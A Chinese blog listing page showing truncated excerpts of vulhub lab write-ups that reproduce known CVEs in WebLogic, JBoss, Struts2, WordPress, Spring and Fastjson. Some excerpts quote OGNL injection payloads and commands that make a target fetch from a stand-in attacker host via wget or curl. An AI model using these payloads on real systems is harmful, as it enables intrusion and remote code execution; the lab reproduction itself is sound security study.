自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(21)
  • 收藏
  • 关注

原创 【vulhub】Weblogic任意文件上传漏洞(CVE-2018-2894)

前言Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制。两个页面分别为/ws_utc/begin.do、/ws_utc/config.do。受影响的版本weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。利用条件:1、需要知道部署应用的web目录2、ws_utc/config.do在开发模式下无需认证,在生产模式下需要认证。一、启动靶机docker-com

2021-12-09 20:16:31 2311

原创 【vulhub】CVE-2020-14882 WebLogic远程代码执行漏洞

前言远程代码执行漏洞 (CVE-2020-14882)POC 已被公开,未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码,利用门槛低,危害巨大。一、启动靶机在这里插入代码片在这里插入代码片二、漏洞利用靶机搭建成功http://192.168.150.146:7001/console/login/LoginForm.j

2021-12-09 17:47:12 2154

原创 【vulhub】JMXInvokerServlet-deserialization JBOOS 反序列化漏洞

前言影响版本JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10JBoss AS (Wildly) 6 and earlierJBoss A-MQ 6.2.0JBoss Fuse 6.2.0JBoss SOA Platform (SOA-P) 5.3.1JBoss Data Grid (JDG) 6.5.0JBoss BRMS (BRMS) 6.1.0JBoss BPMS (BPMS) 6.1.0JBoss Data V

2021-12-09 16:53:30 2363

原创 【vulhub】CVE-2017-7504 JBOOS AS 4.x及之前版本反序列化漏洞

前言JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-12149和CVE-2017-7504都是反序列化漏洞,因此用的东西都是一样的,笔者这里使用上次复现CVE-2017-12149的时候的POC文件。一、启动靶机docker-compose builddocker-compose

2021-12-09 16:32:21 389

原创 【vulhub】CVE-2017-12149 JBOOS AS 6.X 反序列化漏洞

前言2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。但近期有安全研究者发现JBOSSAS 6.x也受该漏洞影响,攻击者利用该漏洞无需用户验证在系统上执行任意命令,获得服务器的控制权。一、启动

2021-12-09 16:11:31 2913

原创 【vulhub】Structs2 S2-032 远程代码执行漏洞(CVE-2016-3081)

前言4月15号安恒安全研究院在Struts 2上发现了一个严重的远程代码执行漏洞(CVE-2016-3081)(http://seclab.dbappsecurity.com.cn/?p=924),也即Struts 2的s2-032漏洞,4月26日,互联网上披露了Apache Struts 2 S2-032远程代码执行漏洞的利用代码,经测试,远程攻击者利用漏洞可在开启动态方法调用功能的Apache Struts 2服务器上执行任意代码,取得网站服务器控制权。影响版本: Struts 2.3.20 - S

2021-12-07 21:02:39 944

原创 【vulhub】Structs2 S2-045 远程代码执行漏洞(CVE-2017-5638)

前言一、启动靶机docker-compose builddocker-compose up -d二、构造payloadpayload1:Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data在请求头插入上述payload三、漏洞利用payload2:Content-Type:

2021-12-07 17:22:07 527

原创 【vulhub】Structs2 S2-046 远程代码执行漏洞(CVE-2017-5638)

前提Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10一、启动靶机docker-compose builddocker-compose up -d二、

2021-12-07 16:38:54 1009

原创 【vulhub】Struts2 S2-053 远程代码执行漏洞(CVE-2017-12611)

前言Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。影响版本: Struts 2.0.1 - Struts 2.3.33, Struts 2.5 - Struts 2.5.10一、启动靶机docker-compose builddocker-compose up -d二、验证payload:%{(223*223

2021-12-07 15:10:51 434

原创 【vulhub】Struts2 S2-059 远程代码执行漏洞(CVE-2019-0230)

前言Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。影响版本: Struts 2.0.0 - Struts 2.5.20一、启动靶机docker-compose builddocker-compose up -d二、构造payloadview-source:http://192.168.150.146:8080/index.action?i

2021-12-07 14:06:38 1053

原创 【vulhub】Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)

前言Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。一、启动靶机docker-compose builddocker-compose up -d二、构造payload%25{(223*223)}view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)}访

2021-12-07 10:36:05 407

原创 【vulhub】structs2远程命令执行 CVE-2018-11776(S2-057)

前提1、alwaysSelectFullNamespace被设置为true,此时namespace的值是从URL中获取的。URL是可控的,所以namespace也是可控的。2、action元素没有名称空间属性集,或者使用通配符。该名称空间将由用户从URL传递并解析为OGNL表达式,最终导致远程代码执行的脆弱性。一、启动靶机docker-compose builddocker-compose up -d二、构造payloadURL:http://192.168.150.146:8080/s

2021-12-06 20:57:30 486

原创 【vulhub】structs2远程代码执行漏洞 CVE-2017-9805(S2-052)

前言2017年9月5日,Apache Struts发布最新安全公告,Apache Struts2的REST插件存在远程代码执行的高危漏洞,该漏洞由lgtm.com的安全研究员汇报,漏洞编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5

2021-12-06 17:24:44 489

原创 【vulhub】Discuz-命令执行 wooyun-2010-080723

一、启动靶机docker-compose builddocker-compose up -d二、安装URL:http://192.168.150.146:8080/install安装数据库。数据库服务器填写db(必须db,不然安装失败),数据库名为discuz,数据库账号密码均为root,管理员密码任意。填写联系方式页面直接点击跳过本步后跳转到首页,登录成功后进入默认板块,开启Burp抓包,然后随便点击一篇贴子将Cookie修改为下面,点击放包三、构造payload请求:GET

2021-12-06 16:03:21 1673

原创 【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)

一、启动靶机docker-compose builddocker-compose up -d访问URL进行install:http://192.168.150.146:8080二、生成payload前提:命令中空格 用 ${substr{10}{1}{$tod_log}}代替/ 用 ${substr{0}{1}{$spool_directory}}代替命令:/usr/bin/wget --output-document /tmp/rce vps_ip/a.txtpayload:

2021-12-06 13:36:23 369 1

原创 【vulhub】Spring Security OAuth2 RCE(CVE-2016-4977)

一、启动靶机docker-compose up -d url:http://192.168.150.143:8080/oauth/authorizeadmin、adminurl:http://192.168.150.143:8080/oauth/authorize?response_type=${223*223}&client_id=acme&scope=openid&redirect_uri=二、生成payloadcurl http://xx.xx.xx.

2021-12-04 22:36:57 851

原创 【vulhub】Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)

一、启动靶机docker-compose up -d二、生成payloadcurl http://xx.xx.xx.xx/Hacker将执行的命令转换十进制99,117,114,108,32,104,116,116,112,58,47,47,120,120,46,120,120,46,120,120,46,120,120,47,72,97,99,107,101,114payload:PATCH /customers/1 HTTP/1.1Host: localhost:8080Ac

2021-12-04 19:40:37 505

原创 【vulhub】Spring Data Rest 远程命令执行漏洞 (CVE-2018-1273)

**一、启动靶机**docker-compose up -d **二、复现**URL:http://192.168.150.143:8080/users**三、发送Payload**payload:username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://vps主机_IP/Hacker")]=**四、验证**...

2021-12-04 18:36:35 132

原创 【vulhub】Fastjson<=1.2.24 反序列化导致REC漏洞复现

**一、启动vulhub靶机**docker-compose up -d二、公网VPS主机操作1、JDK环境(有版本要求,尽量低于1.8.0_191版本,测试在1.8.0_181可成功)java -versionJDK1.8.0_181下载链接JDK安装2、java的PoC,保存为Exploit.java文件import java.lang.Runtime;import java.lang.Process; public class Exploit{ stat

2021-12-04 10:29:33 187

原创 【docker】x509: certificate has expired or is not yet valid: current time

问题:ntpdate time.windows.com没有ntpdate命令,可通过apt-get下载apt-get install ntpdate

2021-12-04 09:47:33 1003

原创 【vulhub】Fastjson<=1.2.47 反序列化导致REC漏洞复现

**一、启动vulhub靶机**docker-compose up -d二、公网VPS主机操作1、JDK环境(有版本要求,尽量低于1.8.0_191版本,测试在1.8.0_181可成功)java -versionJDK1.8.0_181下载链接JDK安装2、java的PoC,保存为Exploit.java文件import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStrea

2021-12-04 00:20:23 729

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除